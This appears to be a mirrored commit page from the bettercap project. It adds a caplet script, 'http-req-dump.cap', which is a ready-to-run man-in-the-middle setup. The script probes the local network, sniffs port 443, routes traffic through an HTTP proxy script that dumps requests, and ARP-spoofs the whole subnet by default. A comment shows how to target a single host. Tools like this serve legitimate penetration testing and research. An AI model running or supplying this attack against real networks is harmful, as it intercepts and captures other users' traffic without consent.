mirror of
https://github.com/bettercap/bettercap
synced 2025-08-14 10:46:57 -07:00
new: new http-req-dump caplet and js module.
This commit is contained in:
parent
29002eb0b8
commit
2eaee90182
3 changed files with 171 additions and 1 deletions
21
caplets/http-req-dump.cap
Normal file
21
caplets/http-req-dump.cap
Normal file
|
@ -0,0 +1,21 @@
|
|||
# targeting the whole subnet by default, to make it selective:
|
||||
#
|
||||
# sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
|
||||
|
||||
events.stream off
|
||||
|
||||
net.recon on
|
||||
net.probe on
|
||||
sleep 1
|
||||
net.probe off
|
||||
|
||||
set net.sniff.verbose false
|
||||
set net.sniff.local true
|
||||
set net.sniff.filter tcp port 443
|
||||
net.sniff on
|
||||
|
||||
set http.proxy.script caplets/http-req-dump.js
|
||||
clear
|
||||
http.proxy on
|
||||
arp.spoof on
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue